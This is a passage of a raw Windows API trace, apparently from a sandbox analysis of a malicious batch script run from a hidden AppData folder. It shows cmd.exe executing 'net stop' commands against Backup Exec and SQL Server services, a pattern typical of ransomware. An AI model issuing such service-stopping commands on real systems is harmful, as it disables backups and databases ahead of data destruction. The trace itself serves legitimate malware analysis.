lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0216.539] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0216.540] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.540] SetFilePointer (in: hFile=0x74, lDistanceToMove=5795, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16a3 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0216.540] GetProcessHeap () returned 0x3e0000 [0216.540] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0216.540] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.540] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16a3 [0216.540] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x21e, lpOverlapped=0x0) returned 1 [0216.540] SetFilePointer (in: hFile=0x74, lDistanceToMove=5835, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16cb [0216.540] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=40, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop BackupExecAgentAccelerator /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 40 [0216.541] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.541] GetFileType (hFile=0x74) returned 0x1 [0216.541] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.541] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16cb [0216.541] GetProcessHeap () returned 0x3e0000 [0216.541] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0216.541] GetProcessHeap () returned 0x3e0000 [0216.541] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0216.544] _tell (_FileHandle=3) returned 5835 [0216.545] _close (_FileHandle=3) returned 0 [0216.545] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0216.545] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0216.545] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0216.545] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0216.545] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0216.545] _wcsicmp (_String1="net", _String2="CD") returned 11 [0216.545] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0216.545] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0216.545] _wcsicmp (_String1="net", _String2="REN") returned -4 [0216.545] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0216.545] _wcsicmp (_String1="net", _String2="SET") returned -5 [0216.545] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0216.545] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0216.545] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0216.545] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0216.545] _wcsicmp (_String1="net", _String2="MD") returned 1 [0216.545] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0216.545] _wcsicmp (_String1="net", _String2="RD") returned -4 [0216.545] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0216.545] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0216.545] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0216.545] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0216.545] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0216.545] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0216.545] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0216.545] _wcsicmp (_String1="net", _String2="VER") returned -8 [0216.545] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0216.545] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0216.545] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0216.545] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0216.545] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0216.545] _wcsicmp (_String1="net", _String2="START") returned -5 [0216.545] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0216.545] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0216.545] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0216.546] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0216.546] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0216.546] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0216.546] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0216.546] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0216.546] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0216.546] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0216.546] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0216.546] SetErrorMode (uMode=0x0) returned 0x1 [0216.546] GetProcessHeap () returned 0x3e0000 [0216.546] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0216.546] GetProcessHeap () returned 0x3e0000 [0216.546] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0216.547] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.547] GetProcessHeap () returned 0x3e0000 [0216.547] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0216.547] GetProcessHeap () returned 0x3e0000 [0216.547] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0216.547] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0216.547] GetProcessHeap () returned 0x3e0000 [0216.547] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0216.547] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.547] GetProcessHeap () returned 0x3e0000 [0216.547] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0216.548] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0216.548] GetProcessHeap () returned 0x3e0000 [0216.548] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0216.548] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.549] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.549] GetLastError () returned 0x2 [0216.549] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.549] GetLastError () returned 0x2 [0216.550] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.550] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.550] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.551] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.551] GetLastError () returned 0x2 [0216.551] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.551] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.552] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.552] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0216.552] SetErrorMode (uMode=0x0) returned 0x1 [0216.552] GetProcessHeap () returned 0x3e0000 [0216.552] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0216.552] GetProcessHeap () returned 0x3e0000 [0216.552] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0216.553] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.553] GetProcessHeap () returned 0x3e0000 [0216.553] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0216.553] GetProcessHeap () returned 0x3e0000 [0216.553] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0216.553] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0216.553] GetProcessHeap () returned 0x3e0000 [0216.553] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0216.553] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.553] GetProcessHeap () returned 0x3e0000 [0216.553] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0216.554] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0216.554] GetProcessHeap () returned 0x3e0000 [0216.554] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0216.554] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.555] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.555] GetLastError () returned 0x2 [0216.555] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.555] GetLastError () returned 0x2 [0216.556] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.556] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.557] GetLastError () returned 0x2 [0216.557] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.557] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.557] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.558] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0216.558] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0216.558] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0216.558] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.558] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop BackupExecAgentAccelerator /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop BackupExecAgentAccelerator /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop BackupExecAgentAccelerator /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x550, dwThreadId=0xbc4)) returned 1 [0216.562] CloseHandle (hObject=0x74) returned 1 [0216.562] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.562] GetProcessHeap () returned 0x3e0000 [0216.562] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.562] GetEnvironmentStringsW () returned 0x3f8408* [0216.562] GetProcessHeap () returned 0x3e0000 [0216.562] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.563] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.563] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0216.704] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0216.704] CloseHandle (hObject=0x78) returned 1 [0216.704] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0216.704] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0216.704] GetProcessHeap () returned 0x3e0000 [0216.704] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.704] GetEnvironmentStringsW () returned 0x3f8408* [0216.704] GetProcessHeap () returned 0x3e0000 [0216.704] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.705] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.705] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.705] GetProcessHeap () returned 0x3e0000 [0216.705] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.705] GetEnvironmentStringsW () returned 0x3f8408* [0216.705] GetProcessHeap () returned 0x3e0000 [0216.705] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.705] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.705] GetProcessHeap () returned 0x3e0000 [0216.705] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0216.705] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0216.705] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.705] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0216.705] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.705] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0216.705] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.705] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0216.706] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.706] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0216.706] SetConsoleInputExeNameW () returned 0x1 [0216.706] GetConsoleOutputCP () returned 0x1b5 [0216.706] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0216.706] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.706] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0216.706] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0216.706] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.706] SetFilePointer (in: hFile=0x78, lDistanceToMove=5835, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16cb [0216.706] GetProcessHeap () returned 0x3e0000 [0216.706] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0216.707] GetProcessHeap () returned 0x3e0000 [0216.707] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0216.707] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.707] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16cb [0216.707] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1f6, lpOverlapped=0x0) returned 1 [0216.707] SetFilePointer (in: hFile=0x78, lDistanceToMove=5865, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16e9 [0216.707] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=30, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$SQLEXPRESS /y\r\nrator /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 30 [0216.708] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.708] GetFileType (hFile=0x78) returned 0x1 [0216.708] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.708] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16e9 [0216.708] GetProcessHeap () returned 0x3e0000 [0216.708] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0216.708] GetProcessHeap () returned 0x3e0000 [0216.708] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0216.711] _tell (_FileHandle=3) returned 5865 [0216.711] _close (_FileHandle=3) returned 0 [0216.711] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0216.712] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0216.712] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0216.712] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0216.712] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0216.712] _wcsicmp (_String1="net", _String2="CD") returned 11 [0216.712] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0216.712] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0216.712] _wcsicmp (_String1="net", _String2="REN") returned -4 [0216.712] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0216.712] _wcsicmp (_String1="net", _String2="SET") returned -5 [0216.712] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0216.712] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0216.712] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0216.712] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0216.712] _wcsicmp (_String1="net", _String2="MD") returned 1 [0216.712] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0216.712] _wcsicmp (_String1="net", _String2="RD") returned -4 [0216.712] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0216.712] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0216.712] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0216.712] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0216.712] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0216.712] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0216.712] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0216.712] _wcsicmp (_String1="net", _String2="VER") returned -8 [0216.712] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0216.712] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0216.712] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0216.712] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0216.712] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0216.712] _wcsicmp (_String1="net", _String2="START") returned -5 [0216.712] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0216.712] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0216.712] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0216.712] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0216.712] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0216.712] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0216.712] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0216.712] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0216.713] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0216.713] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0216.713] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: 